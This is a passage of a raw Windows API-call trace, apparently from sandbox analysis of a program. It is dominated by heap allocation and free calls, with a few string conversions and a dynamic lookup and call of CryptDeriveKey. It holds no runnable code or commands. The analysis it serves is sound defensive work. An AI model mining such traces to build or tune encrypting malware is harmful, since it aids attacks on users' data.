lpMsg=0x8bef60) returned 0 [0208.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0208.180] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0208.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0208.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0208.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0208.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0208.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0208.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0208.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0208.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0208.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0208.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0208.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0208.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0208.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0208.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0208.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0208.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0208.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0208.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0208.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0208.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0208.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0208.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0208.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0208.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0208.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0208.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0208.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0208.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0208.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0208.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0208.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0208.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0208.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0208.182] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0208.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0208.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0208.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa00 [0208.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0208.182] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0208.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0208.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0208.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0208.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0208.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0208.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0208.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0208.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0208.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0208.183] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0208.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0208.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0208.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0208.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0208.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0208.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0208.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0208.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0208.183] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0208.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0208.183] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0208.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0208.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0208.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0208.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0208.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0208.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0208.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0208.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0208.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0208.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0208.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0208.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0208.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0208.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0208.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0208.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0208.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0208.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0208.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0208.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0208.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0208.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0208.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0208.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0208.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0208.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0208.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0208.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0208.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0208.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0208.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0208.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0208.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0208.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0208.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0208.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0208.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0208.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0208.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0208.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0208.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0208.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0208.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0208.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0208.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0208.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0208.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0208.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0208.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0208.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0208.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0208.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0208.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0208.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0208.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0208.186] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0208.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0208.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0208.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0208.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0208.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0208.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0208.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0208.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0208.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0208.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0208.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0208.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0208.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0208.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0208.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0208.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0208.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0208.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0208.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0208.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0208.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0208.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0208.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0208.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0208.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0208.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0208.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0208.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0208.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0208.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0208.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0208.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0208.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0208.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0208.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0208.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0208.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0208.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0208.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0208.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0208.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0208.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0208.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0208.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0208.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0208.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0208.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0208.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0208.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0208.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0208.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0208.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0208.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0208.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0208.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0208.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0208.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0208.189] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0208.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xf) returned 0x34aa928 [0208.189] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x34aa928, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0208.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0208.190] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDeriveKey") returned 0x74d83188 [0208.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0208.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0208.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0208.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0208.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0208.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0208.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0208.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0208.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0208.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0208.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0208.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0208.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0208.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0208.191] CryptDeriveKey (in: hProv=0xad2940, Algid=0x6601, hBaseData=0xaa58e0, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa57e0) returned 1 [0208.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0208.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0208.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0208.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0208.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0208.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0208.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0208.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0208.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0208.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0208.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0208.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0208.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0208.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0208.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0208.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0208.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0208.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0208.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0208.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0208.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0208.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0208.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0208.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0208.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0208.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0208.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0208.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0208.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0208.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0208.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0208.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0208.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0208.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0208.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0208.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0208.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0208.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0208.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0208.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0208.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0208.193] RtlAllocateHeap 